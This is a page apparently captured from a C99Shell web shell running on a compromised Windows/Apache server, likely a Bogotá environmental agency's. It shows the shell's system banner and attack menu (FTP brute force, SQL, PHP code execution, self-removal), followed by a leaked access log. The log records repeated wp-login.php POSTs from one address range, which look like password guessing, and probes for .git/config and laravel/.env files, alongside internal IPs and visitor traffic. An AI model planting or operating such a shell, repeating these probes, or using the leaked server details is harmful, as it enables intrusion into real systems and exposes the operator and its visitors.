!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 7.33 GB of 239.26 GB (3.06%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2023.01.06.log (3.12 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
172.22.2.4 - - [05/Jan/2023:23:58:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
66.249.73.127 - - [06/Jan/2023:00:00:50 -0500] "-" 408 -
216.245.221.92 - - [06/Jan/2023:00:01:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:00:03:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:00:03:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:00:04:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52079
216.245.221.92 - - [06/Jan/2023:00:06:16 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [06/Jan/2023:00:07:07 -0500] "-" 408 -
201.245.192.253 - - [06/Jan/2023:00:08:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:00:09:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [06/Jan/2023:00:11:16 -0500] "HEAD / HTTP/1.1" 200 -
69.171.249.23 - - [06/Jan/2023:00:11:27 -0500] "GET /images/empresas-industrias-forestales-1-junio.jpg HTTP/1.1" 200 44019
69.171.249.12 - - [06/Jan/2023:00:11:27 -0500] "GET /secretaria-de-ambiente-destaca-practicas-sostenibles-de-10-empresas-forestales.html HTTP/1.1" 206 812
173.252.79.111 - - [06/Jan/2023:00:11:29 -0500] "GET /images/empresas-industrias-forestales-1-junio.jpg HTTP/1.1" 200 44019
172.22.2.4 - - [06/Jan/2023:00:10:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
66.249.73.127 - - [06/Jan/2023:00:13:11 -0500] "-" 408 -
201.245.192.253 - - [06/Jan/2023:00:13:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:00:12:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62423
159.203.166.40 - - [06/Jan/2023:00:14:36 -0500] "GET / HTTP/1.0" 200 319
199.16.157.181 - - [06/Jan/2023:00:14:59 -0500] "GET /images/Acuerdos%2001%20(1)%20(1).jpeg HTTP/1.1" 200 32884
185.119.81.100 - - [06/Jan/2023:00:15:48 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [06/Jan/2023:00:15:49 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [06/Jan/2023:00:16:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:00:15:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:00:15:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
31.13.127.19 - - [06/Jan/2023:00:17:40 -0500] "GET /images/Entrenubes%201%20(1)%20(1).jpeg HTTP/1.1" 200 70096
51.79.77.185 - - [06/Jan/2023:00:18:08 -0500] "GET /auambari-deleito-con-sus-sonidos-ambientales-a-los-asistentes-de-fima-2021.html HTTP/1.1" 200 888
201.245.192.253 - - [06/Jan/2023:00:18:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
66.249.73.127 - - [06/Jan/2023:00:18:48 -0500] "-" 408 -
152.231.27.122 - - [06/Jan/2023:00:19:17 -0500] "HEAD /appsia/controlador HTTP/1.1" 200 -
152.231.27.122 - - [06/Jan/2023:00:19:17 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
152.231.27.122 - - [06/Jan/2023:00:19:17 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
152.231.27.122 - - [06/Jan/2023:00:19:17 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
152.231.27.122 - - [06/Jan/2023:00:19:17 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
152.231.27.122 - - [06/Jan/2023:00:19:17 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
152.231.27.122 - - [06/Jan/2023:00:19:17 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [06/Jan/2023:00:19:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42189
201.245.192.253 - - [06/Jan/2023:00:19:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43929
152.231.27.122 - - [06/Jan/2023:00:19:41 -0500] "POST /appsia/controlador HTTP/1.1" 200 3601
152.231.27.122 - - [06/Jan/2023:00:19:41 -0500] "GET /appsia/jscripts/validarSolicitud.js HTTP/1.1" 404 68
152.231.27.122 - - [06/Jan/2023:00:20:01 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
216.245.221.92 - - [06/Jan/2023:00:21:16 -0500] "HEAD / HTTP/1.1" 200 -
166.0.218.27 - - [06/Jan/2023:00:22:29 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [06/Jan/2023:00:20:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.67.157.197 - - [06/Jan/2023:00:23:03 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/2PWPi9f6k6S1tIe5IdkN+gdEcuNnN5lAjuYQyu2gdITzgMAPkSYzE&y=U2FsdGVkX1+hTQagqNd/CZvt9l3ltBYanSkyqHyXI/sXoWLvS6zA1VHo+kXmOU+u HTTP/1.1" 200 30
190.67.157.197 - - [06/Jan/2023:00:23:04 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18Q+6pYgWLkRRrvSulbWaChZQSXea4OP3LwxCtNAj4JKn8ntMCgKXOAiNTXWuBEET81XQEAiT74VX6z3bJ1u2LL4HSTph3y3NM=&u=U2FsdGVkX19Pa24PpxNjNpWl6pBjzhtsMUurM1oe2qsoG7Z3gAoJRmWOX3pMFtJS&y=U2FsdGVkX1+hTQagqNd/CZvt9l3ltBYanSkyqHyXI/sXoWLvS6zA1VHo+kXmOU+u HTTP/1.1" 200 97
190.67.157.197 - - [06/Jan/2023:00:23:04 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18kW9CcP9A8OByR+AsDzxbeCP5TjcbPoxQZeZgYjqC21iu4TEicMljOe3W2CXDfVlRk12KnoS8HeZyHeHdf4HPvHRZwn4muvdSn/SjeDcTPk1oxn8ximiAEOzrY1j7wRx1bn2TbflbvISQlF23olDfRhgQbboAfFS+TUNMXcaeIR5HS0scYbVpvy3nmw56pt2pLdgzWEazfSy7EhwQlLAEgZtXA0KSihKKhMQAz45yV+SFTqg7vU6RaUMzUDt3gxYgEw29IoLYdXOvCSP4IKEQ1elZkq60KtwXRp09clUg4CrDmPeE7QLRFcaAWD+txxoPvAIfI0ptEByqthhLJoqIyYCWKlS6JNk5xlt6sUTD+g9FWR2UsPsO3c94YOO/J+2JmRVIfkLyOBvw0TnEfBWNKqiLb8SYRDEwvlqWJ7MfcMaoBHlTZqqQr/Fuej728E4U2QesJRF/izwkmhBwZ46fIXZo70QSRKiua10ACWBD11Nil09c5VLEoseM43Z37rEwQJ/GxhjR1sUv/J6uc1yWo0dI1XCdpMQLiWW2HVtwRF7XofGEM1BmKgAYNeQAOoBKC7kt87LTI1GVbIQGa5ce7UzFQHOwMSSnp/VVazxRVoqP4MS7rUTOqHL9EkIYPi+KHAP0CXmTaAoHme+jYbUKH2d+i0FJ60z4AEI4X9eFpl+Sn36ZyvE2J9SAMlGJuu+BskjyOc1jzK2I6oBP6ShKsTtaJCB/KPJB9K+VERffJPhy03upwI3Cog4RUDri1xUCZXTqD52y+A0VwZt5Onq5oA3WsgG/wNxMZVyINSs1wETllY/XWLMvDg2ENrbNu9fYCs2ZKEHkfyCEL/MT9OwgJGj4oNao5SIHg8Zh1B7swiNm4Oz0GQF0tQ/4jW5A9R81knqaUHWZ0+GIOlZwljppQVGtf7y5vKMH9W6E6cdMrV94A48BxRtmxN4+7KgdYVrhXFUEKCUTbxvQmuxe6AWY0sBKmWPNLwVmnXCZbgB/xddT+1QWJT7k6DNDKgUAmKhjNjs0fzHupgEMStvT4bqku0Cd8MfGAWqoq++jCtOMjh9e3VyXhmlEh6smvdlNScboBnAoUAqNT71kP7ghuY3N8yXLBn0TzeLFOp4NOO2nt+HNmPXa7JJEctccOCukjAo8/NCTJss4FKMcCBj7eKtyCsOFwis0QhaW4v46yUp7taugC4Rq8lL9j387h6pR3QVmcP1KD7pRtfgjAoP9SWzNbifKZTOfYc4XZubYb9g4iX779ohdkWv6QO+dz4pQGW+rAUxf24PCRYfwaUjoDMPsrYUv+LOyR9Ejf1oXXnNBdm/lc+YyqxgGn1lHMjqmTBmyPpa9Eb9QjS1CkhKaonQC9PyPaTnCsrWvuD3PqRmIEdgTyovyUkvKm8HRO3udTlKmDRI7kb9BXqhlT9/uaWBPs8hq4SjHzJWA=&u=U2FsdGVkX19Pa24PpxNjNpWl6pBjzhtsMUurM1oe2qsoG7Z3gAoJRmWOX3pMFtJS&y=U2FsdGVkX1+hTQagqNd/CZvt9l3ltBYanSkyqHyXI/sXoWLvS6zA1VHo+kXmOU+u HTTP/1.1" 200 15982
190.67.157.197 - - [06/Jan/2023:00:23:04 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+xG+nu3KldLoRGsC41e4/LovRFxmZJmjnzCdfRDZ/Rc4+k1OYRef0N9CNOUqsX7PUPCizqJlep96kKbfpoRiAHyKaCXnNZDLoNWItSfBmUNGzTLPPrDKyradEoZvQRoPVa5x3h/N3sehxFohLjZO7nnxAZeGcQtNA/fmaU8EjyF60O3B7Z/EYSeOQhb78pzgATG98yY0oJzRA5rvgKW8KcOIYRd4/8h3/glbSExq3uXxA3c8b7Bjqyd61wJ/Jvargfjc6UF2GWsySvxqSQ86yCklKf5hY9dmQXT/tsblDTdyjx2ZYUXxRYL1YwqwSTYb0fPf36lID6SfWMVcj4p/9kDzWL4mbnRyI=&u=U2FsdGVkX19Pa24PpxNjNpWl6pBjzhtsMUurM1oe2qsoG7Z3gAoJRmWOX3pMFtJS&y=U2FsdGVkX1+hTQagqNd/CZvt9l3ltBYanSkyqHyXI/sXoWLvS6zA1VHo+kXmOU+u HTTP/1.1" 200 196
190.67.157.197 - - [06/Jan/2023:00:23:04 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1/2PWPi9f6k6S1tIe5IdkN+gdEcuNnN5lAjuYQyu2gdITzgMAPkSYzE HTTP/1.1" 200 31032
201.245.192.253 - - [06/Jan/2023:00:23:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:00:21:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56079
152.231.27.122 - - [06/Jan/2023:00:24:59 -0500] "HEAD /appsia/controlador HTTP/1.1" 200 -
152.231.27.122 - - [06/Jan/2023:00:24:59 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
152.231.27.122 - - [06/Jan/2023:00:25:52 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
152.231.27.122 - - [06/Jan/2023:00:25:58 -0500] "POST /appsia/controlador HTTP/1.1" 200 7736
152.231.27.122 - - [06/Jan/2023:00:25:58 -0500] "GET /appsia/images/logo_escudo.png HTTP/1.1" 200 36965
216.245.221.92 - - [06/Jan/2023:00:26:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:00:28:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:00:26:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:00:27:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
201.245.192.253 - - [06/Jan/2023:00:29:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42189
201.245.192.253 - - [06/Jan/2023:00:29:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43929
143.255.242.220 - - [06/Jan/2023:00:29:56 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [06/Jan/2023:00:31:16 -0500] "HEAD / HTTP/1.1" 200 -
159.203.166.40 - - [06/Jan/2023:00:32:23 -0500] "GET / HTTP/1.1" 200 319
159.203.166.40 - - [06/Jan/2023:00:32:23 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
173.252.111.18 - - [06/Jan/2023:00:32:37 -0500] "GET /images/cr\xc3\xb3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
201.245.192.253 - - [06/Jan/2023:00:33:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
173.252.107.5 - - [06/Jan/2023:00:34:10 -0500] "GET /secretaria-de-ambiente-y-universidad-de-la-salle-firman-acuerdo-de-conservacion-en-17-hectareas.html HTTP/1.1" 206 990
172.22.2.4 - - [06/Jan/2023:00:32:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:00:33:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
185.119.81.105 - - [06/Jan/2023:00:35:14 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [06/Jan/2023:00:35:15 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
66.220.149.111 - - [06/Jan/2023:00:35:44 -0500] "GET /images/negocios-verdes-mayo-2022.jpg HTTP/1.1" 200 48000
64.124.8.31 - - [06/Jan/2023:00:35:50 -0500] "GET /portaldeninos/wp-content/uploads/2020/01/Tierra-escenario.jpg HTTP/1.1" 200 162054
114.119.148.33 - - [06/Jan/2023:00:35:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/0361.pdf HTTP/1.1" 200 7204029
64.124.8.31 - - [06/Jan/2023:00:35:51 -0500] "GET /portaldeninos/wp-content/uploads/2021/07/Banners-pa%CC%81gina-de-nin%CC%83os12-1-1024x50.jpg HTTP/1.1" 200 3862
64.124.8.31 - - [06/Jan/2023:00:35:52 -0500] "GET /portaldeninos/wp-content/uploads/2021/07/Banners-pa%CC%81gina-de-nin%CC%83os2.jpg HTTP/1.1" 200 33818
64.124.8.31 - - [06/Jan/2023:00:35:51 -0500] "GET /portaldeninos/wp-content/uploads/2020/11/Capellan%C3%ADa-B-1024x576.jpg HTTP/1.1" 200 100158
64.124.8.31 - - [06/Jan/2023:00:35:59 -0500] "GET /portaldeninos/wp-content/uploads/2021/11/tunel-ambiente-6-junio-80x80.jpg HTTP/1.1" 200 2848
216.245.221.92 - - [06/Jan/2023:00:36:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:00:38:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
201.245.192.253 - - [06/Jan/2023:00:39:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42189
201.245.192.253 - - [06/Jan/2023:00:39:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43929
172.22.2.4 - - [06/Jan/2023:00:38:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:00:39:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58185
216.245.221.92 - - [06/Jan/2023:00:41:16 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [06/Jan/2023:00:42:55 -0500] "-" 408 -
201.245.192.253 - - [06/Jan/2023:00:43:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
114.119.134.195 - - [06/Jan/2023:00:44:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/3593.pdf HTTP/1.1" 200 505783
40.77.167.33 - - [06/Jan/2023:00:44:38 -0500] "GET /php/CarreraAdministrativa/HERRAMIENTA_EVALUACION_SDA1_NIVEL_TECNICO1_2010.xls HTTP/1.1" 404 1018
172.22.2.4 - - [06/Jan/2023:00:44:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [06/Jan/2023:00:46:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:00:45:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [06/Jan/2023:00:45:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52942
185.119.81.100 - - [06/Jan/2023:00:47:49 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [06/Jan/2023:00:47:50 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [06/Jan/2023:00:48:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
45.33.80.237 - - [06/Jan/2023:00:49:09 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
45.33.80.237 - - [06/Jan/2023:00:49:09 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
45.33.80.237 - - [06/Jan/2023:00:49:09 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
92.118.39.29 - - [06/Jan/2023:00:49:20 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [06/Jan/2023:00:51:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:00:50:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:00:50:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53337
201.245.192.253 - - [06/Jan/2023:00:53:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
216.245.221.92 - - [06/Jan/2023:00:56:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:00:55:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:00:58:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:00:56:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54100
185.119.81.105 - - [06/Jan/2023:00:59:39 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [06/Jan/2023:00:59:40 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
185.119.81.100 - - [06/Jan/2023:00:59:58 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [06/Jan/2023:00:59:59 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
40.77.167.12 - - [06/Jan/2023:01:00:13 -0500] "GET /Publicaciones/2022EE129731.pdf HTTP/1.1" 404 228
216.245.221.92 - - [06/Jan/2023:01:01:16 -0500] "HEAD / HTTP/1.1" 200 -
114.119.151.175 - - [06/Jan/2023:01:02:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6812.pdf HTTP/1.1" 200 1530101
20.62.145.15 - - [06/Jan/2023:01:02:39 -0500] "HEAD /galeria/galeria/fancybox_sprite.png HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:01:03:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:01:01:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
177.126.58.14 - - [06/Jan/2023:01:04:02 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [06/Jan/2023:01:02:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
216.245.221.92 - - [06/Jan/2023:01:06:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:01:08:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
152.61.192.232 - - [06/Jan/2023:01:08:09 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [06/Jan/2023:01:07:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:01:08:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
216.245.221.92 - - [06/Jan/2023:01:11:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:01:13:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:01:12:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [06/Jan/2023:01:15:02 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20C-595-2010.doc HTTP/1.1" 200 39424
172.22.2.4 - - [06/Jan/2023:01:13:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:01:14:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56474
172.22.2.4 - - [06/Jan/2023:01:15:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
216.245.221.92 - - [06/Jan/2023:01:16:16 -0500] "HEAD / HTTP/1.1" 200 -
141.144.254.168 - - [06/Jan/2023:01:16:42 -0500] "GET /galeria/galeria/fotos/Humedal-Tibanica2P.jpg HTTP/1.1" 200 29568
141.144.254.168 - - [06/Jan/2023:01:17:59 -0500] "GET /galeria/galeria/fotos/Humedal-Tibanica4P.jpg HTTP/1.1" 200 26708
201.245.192.253 - - [06/Jan/2023:01:18:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
201.245.192.253 - - [06/Jan/2023:01:19:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42326
201.245.192.253 - - [06/Jan/2023:01:19:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43606
183.136.225.32 - - [06/Jan/2023:01:20:06 -0500] "GET / HTTP/1.1" 200 319
138.201.157.89 - - [06/Jan/2023:01:20:54 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [06/Jan/2023:01:19:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [06/Jan/2023:01:21:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:01:20:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52079
152.61.128.50 - - [06/Jan/2023:01:21:56 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [06/Jan/2023:01:22:28 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2004%20del%2028%20de%20Abril%20de%202017.pdf HTTP/1.1" 200 8194919
201.245.192.253 - - [06/Jan/2023:01:23:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
157.55.39.212 - - [06/Jan/2023:01:23:58 -0500] "GET / HTTP/1.1" 200 319
185.119.81.105 - - [06/Jan/2023:01:24:29 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [06/Jan/2023:01:24:30 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
216.245.221.92 - - [06/Jan/2023:01:26:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:01:26:35 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
172.22.2.4 - - [06/Jan/2023:01:25:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.136.100 - - [06/Jan/2023:01:27:22 -0500] "-" 408 -
172.22.2.4 - - [06/Jan/2023:01:25:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
201.245.192.253 - - [06/Jan/2023:01:28:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
201.245.192.253 - - [06/Jan/2023:01:29:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42326
201.245.192.253 - - [06/Jan/2023:01:29:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43606
172.22.2.4 - - [06/Jan/2023:01:29:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
216.245.221.92 - - [06/Jan/2023:01:31:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:01:30:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:01:32:36 -0500] "GET /BLA/boletinlegal/.git/config HTTP/1.1" 404 1018
162.55.35.116 - - [06/Jan/2023:01:32:46 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [06/Jan/2023:01:33:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:01:31:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53739
172.22.2.4 - - [06/Jan/2023:01:31:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54100
66.249.73.127 - - [06/Jan/2023:01:34:11 -0500] "-" 408 -
216.245.221.92 - - [06/Jan/2023:01:36:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:01:37:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:01:36:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:01:37:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
201.245.192.253 - - [06/Jan/2023:01:39:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42326
201.245.192.253 - - [06/Jan/2023:01:39:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43606
216.245.221.92 - - [06/Jan/2023:01:41:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:01:41:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
201.245.192.253 - - [06/Jan/2023:01:42:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:01:42:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:01:43:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
114.119.159.135 - - [06/Jan/2023:01:45:45 -0500] "GET /autoliquidacion2020/index.php?dir=Aceites-Residuos-Estaciones-/Inscripci%C3%83%C2%83%C3%82%C2%AF%C3%83%C2%82%C3%82%C2%BF%C3%83%C2%82%C3%82%C2%BDn%2Ben%2Bel%2Bregistro%2Bde%2Bgeneradores%2Bde%2Bresiduos%2Bo%2Bdesechos%2Bpeligrosos/&sort=name&order=asc HTTP/1.1" 200 6717
216.245.221.92 - - [06/Jan/2023:01:46:16 -0500] "HEAD / HTTP/1.1" 200 -
152.61.192.232 - - [06/Jan/2023:01:46:28 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [06/Jan/2023:01:46:29 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [06/Jan/2023:01:46:30 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
185.119.81.102 - - [06/Jan/2023:01:46:52 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [06/Jan/2023:01:46:53 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [06/Jan/2023:01:47:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:01:50:03 -0500] "POST /BLA/boletinlegal/laravel/.env HTTP/1.1" 404 1018
172.22.2.4 - - [06/Jan/2023:01:48:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:01:49:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
216.245.221.92 - - [06/Jan/2023:01:51:16 -0500] "HEAD / HTTP/1.1" 200 -
128.14.136.18 - - [06/Jan/2023:01:51:38 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
